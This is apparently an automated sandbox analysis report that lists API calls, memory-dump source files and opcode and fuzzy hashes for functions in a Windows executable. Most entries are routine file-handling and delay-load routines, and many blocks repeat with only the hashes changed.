                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 970f8339bea60ad71e26898c6fadbe3db20f03f563e7130034a496890bd310fc
                                                                  • Instruction ID: ce3e62205c231c5dbd788bbc86e0a16f39411df2767419de0e584c34d47182cc
                                                                  • Opcode Fuzzy Hash: 970f8339bea60ad71e26898c6fadbe3db20f03f563e7130034a496890bd310fc
                                                                  • Instruction Fuzzy Hash: A6B092A9258000AC3144650B1802D7A018CC081B11330842FB805C2080A868AD01193B
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046EAF9
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: 3Qo
                                                                  • API String ID: 1269201914-1944013411
                                                                  • Opcode ID: 91cb560bdf40f2049ba60565fe15e5c5d516a5aac47f05bddc3087c0bf5c0d6e
                                                                  • Instruction ID: f09b5dc1b109cf60697a7cc3f2e502d86c6dc494e20bf367200c57b0c6da8fc1
                                                                  • Opcode Fuzzy Hash: 91cb560bdf40f2049ba60565fe15e5c5d516a5aac47f05bddc3087c0bf5c0d6e
                                                                  • Instruction Fuzzy Hash: 91B092CA29A0427C220472431942C3A0148C580B91330842FB40095081B8880C06083B
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 3e2a9cc56742ac775057549b35c904ecc935fb81e84b30a482aa6d52a9653ed2
                                                                  • Instruction ID: d74042b2aef2addc60471e7b5e8a7541c5bd80ae807d560fa097ef6cfa62cec7
                                                                  • Opcode Fuzzy Hash: 3e2a9cc56742ac775057549b35c904ecc935fb81e84b30a482aa6d52a9653ed2
                                                                  • Instruction Fuzzy Hash: B2B012E9298000FC3544B10B1D02D7B01CCC0C1B11330843FF805C2080FC5CAD02193F
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E51F
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: PDGu<F
                                                                  • API String ID: 1269201914-164939742
                                                                  • Opcode ID: fb8f74a4cd1d02fd743cb8e85ebb73d2cde4ad2a3837a1c6878cdb398223cba6
                                                                  • Instruction ID: f1a54a377df9c6d71daec48e9b6dc6ba6af7f467ecc75dcc26e78cafdd5989bc
                                                                  • Opcode Fuzzy Hash: fb8f74a4cd1d02fd743cb8e85ebb73d2cde4ad2a3837a1c6878cdb398223cba6
                                                                  • Instruction Fuzzy Hash: 09B09289258100BC2244714B9C02D7A0188C481B19330862FB405C2080B8481C45093F
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E51F
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: PDGu<F
                                                                  • API String ID: 1269201914-164939742
                                                                  • Opcode ID: fa884e8d28bd209af9ed28df320cce34d83bb4af9244ab0a93dc1dc25090054b
                                                                  • Instruction ID: 29c6e3afbe58b7eb1bf4ea4a8526558cbbcce2c29518fca6fe8aee0593a93e86
                                                                  • Opcode Fuzzy Hash: fa884e8d28bd209af9ed28df320cce34d83bb4af9244ab0a93dc1dc25090054b
                                                                  • Instruction Fuzzy Hash: 10B012C92580007C3104316B5C06D7F014CC4C1F1D330853FF411D14C1B85C0D05083F
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 5d14e557d79dc315e28e5a5058748226c633c03f11acb60ec9f1c73fe115dcee
                                                                  • Instruction ID: 03d0a76dfa8be5e6548c9db6af0abca64741e42e84de38ea065f2b1398fc2a78
                                                                  • Opcode Fuzzy Hash: 5d14e557d79dc315e28e5a5058748226c633c03f11acb60ec9f1c73fe115dcee
                                                                  • Instruction Fuzzy Hash: BEA011EA2A8002FC300832032C02C3B028CC0C2B20330882FF802C2080B8A8AC02283B
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 8ae7c42506428b97710356355f00b5a84ea934755b5fb77b6a971c9f314d3c3c
                                                                  • Instruction ID: 03d0a76dfa8be5e6548c9db6af0abca64741e42e84de38ea065f2b1398fc2a78
                                                                  • Opcode Fuzzy Hash: 8ae7c42506428b97710356355f00b5a84ea934755b5fb77b6a971c9f314d3c3c
                                                                  • Instruction Fuzzy Hash: BEA011EA2A8002FC300832032C02C3B028CC0C2B20330882FF802C2080B8A8AC02283B
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 863dff8857bfcda675b25b4dac74791ed52de01fb9803c37762144f1113dd29e
                                                                  • Instruction ID: 03d0a76dfa8be5e6548c9db6af0abca64741e42e84de38ea065f2b1398fc2a78
                                                                  • Opcode Fuzzy Hash: 863dff8857bfcda675b25b4dac74791ed52de01fb9803c37762144f1113dd29e
                                                                  • Instruction Fuzzy Hash: BEA011EA2A8002FC300832032C02C3B028CC0C2B20330882FF802C2080B8A8AC02283B
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 2cc0c111ef8e2895b1d4ab80adbd28845d7ea1aedac8cd422593d42d79059708
                                                                  • Instruction ID: 03d0a76dfa8be5e6548c9db6af0abca64741e42e84de38ea065f2b1398fc2a78
                                                                  • Opcode Fuzzy Hash: 2cc0c111ef8e2895b1d4ab80adbd28845d7ea1aedac8cd422593d42d79059708
                                                                  • Instruction Fuzzy Hash: BEA011EA2A8002FC300832032C02C3B028CC0C2B20330882FF802C2080B8A8AC02283B
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
  • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
  • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: F
• API String ID: 1269201914-39334831
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0046E51F
  • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
  • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: PDGu<F
• API String ID: 1269201914-164939742
                                                                  APIs
                                                                    • Part of subcall function 0047B7BB: GetOEMCP.KERNEL32(00000000,?,?,0047BA44,?), ref: 0047B7E6
                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0047BA89,?,00000000), ref: 0047BC64
                                                                  • GetCPInfo.KERNEL32(00000000,0047BA89,?,?,?,0047BA89,?,00000000), ref: 0047BC77
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: CodeInfoPageValid
                                                                  • String ID:
                                                                  • API String ID: 546120528-0
                                                                  • Opcode ID: 43c6489877af0cd3ddcb82e0cc4f79a95fad2a288ccb400f6a5bbe0869bc4593
                                                                  • Instruction ID: 494c2c8812923be56c86a07d044dd3c022691c746887fd105ce51abc78d68909
                                                                  • Opcode Fuzzy Hash: 43c6489877af0cd3ddcb82e0cc4f79a95fad2a288ccb400f6a5bbe0869bc4593
                                                                  • Instruction Fuzzy Hash: 07511F709002059EDB258F76C8817FBBBA5EF41304F18C46FD49A8B252D73C99468BD9
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00459A50,?,?,00000000,?,?,00458CBC,?), ref: 00459BAB
                                                                  • GetLastError.KERNEL32(?,00000000,00458411,-00009570,00000000,000007F3), ref: 00459BB6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastPointer
                                                                  • String ID:
                                                                  • API String ID: 2976181284-0
                                                                  • Opcode ID: 248818c1fadccd782f835514a8aa585d225dcd8dbb2172f24ccd346eebde085d
                                                                  • Instruction ID: 93bd81f00fb438e0d226445fc4f4be4a9a52d89e0be2d5b842f5133ee0283ccb
                                                                  • Opcode Fuzzy Hash: 248818c1fadccd782f835514a8aa585d225dcd8dbb2172f24ccd346eebde085d
                                                                  • Instruction Fuzzy Hash: 7E41CD30904341CBEB24DF15E58446BB7E5FBD5712F148A2EEC8183362E778BD098B59
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00451E55
                                                                    • Part of subcall function 00453BBA: __EH_prolog.LIBCMT ref: 00453BBF
                                                                  • _wcslen.LIBCMT ref: 00451EFD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog$_wcslen
                                                                  • String ID:
                                                                  • API String ID: 2838827086-0
                                                                  • Opcode ID: 7ecbe93e0df32804224e6873d210ea26aea7e05082c6d50f2cc8c2c4a8b6e342
                                                                  • Instruction ID: cc053990ec7634d5f0501a5c86a1d9aef9730bf0b6b1cb3c6652bea75c039455
                                                                  • Opcode Fuzzy Hash: 7ecbe93e0df32804224e6873d210ea26aea7e05082c6d50f2cc8c2c4a8b6e342
                                                                  • Instruction Fuzzy Hash: D8314B71904209AFCF11EF99C945AEEBBF5AF08305F10406EE845A7262D73A5E44CB69
                                                                  APIs
                                                                  • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,004573BC,?,?,?,00000000), ref: 00459DBC
                                                                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 00459E70
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: File$BuffersFlushTime
                                                                  • String ID:
                                                                  • API String ID: 1392018926-0
                                                                  • Opcode ID: 5aa29e763940ebb6e5b89b153a402bc0971f3f7f3e849c8e975ef133765da8ef
                                                                  • Instruction ID: cd4cd8d1426b9be5ca2563111c8fc4ea950af1690d8631406321a70ce779db7f
                                                                  • Opcode Fuzzy Hash: 5aa29e763940ebb6e5b89b153a402bc0971f3f7f3e849c8e975ef133765da8ef
                                                                  • Instruction Fuzzy Hash: 6621F231248245EBC714CF35C492AABBBE8AF51305F08481EF8C587692D32DED0C9B66
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00459F27,?,?,0045771A), ref: 004596E6
                                                                  • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00459F27,?,?,0045771A), ref: 00459716
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 75caaf87188feefd96b3cdb7222abf340f209387738f8564e81deb6d0387a0bb
                                                                  • Instruction ID: 206af88d360433a6e6a9e46a54c049aa887e96ed10d02f8b91fa7c23b0d1d1ce
                                                                  • Opcode Fuzzy Hash: 75caaf87188feefd96b3cdb7222abf340f209387738f8564e81deb6d0387a0bb
                                                                  • Instruction Fuzzy Hash: 6621C171500344AFE3308A65CC89BA777DCEB49326F000A1EFD95C66D2C77CAC889675
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00459EC7
                                                                  • GetLastError.KERNEL32 ref: 00459ED4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastPointer
                                                                  • String ID:
                                                                  • API String ID: 2976181284-0
